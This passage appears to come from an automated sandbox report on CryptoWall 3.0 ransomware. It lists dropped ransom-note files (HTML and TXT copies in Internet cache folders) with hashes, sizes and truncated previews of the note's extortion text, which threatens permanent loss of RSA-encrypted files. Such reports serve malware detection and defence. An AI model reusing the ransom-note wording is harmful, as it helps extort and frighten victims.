                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ip[1].txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):12
                                                                                                                          Entropy (8bit):2.8553885422075336
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:fuMEc:23c
                                                                                                                          MD5:99C7886BEA2DE7A0101C2650904125B2
                                                                                                                          SHA1:923B92CB8983479444E728E099B85F84A8DC1358
                                                                                                                          SHA-256:FFF62C3400A9C4F4618583FD90966E4E5B1122239157CAA576BFD6A1FA71204D
                                                                                                                          SHA-512:7FB99EB3F5DF99B330325BB84C3676ABFD4BA02A2F37C596FDBD717FEEEA84887522E4957D57FD2C77A6A73C56656D1B8A8D17BB28CE158CD474ECE6E71B5565
                                                                                                                          Malicious:false
                                                                                                                          Preview:8.46.123.189

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\AntiPhishing\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\AntiPhishing\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
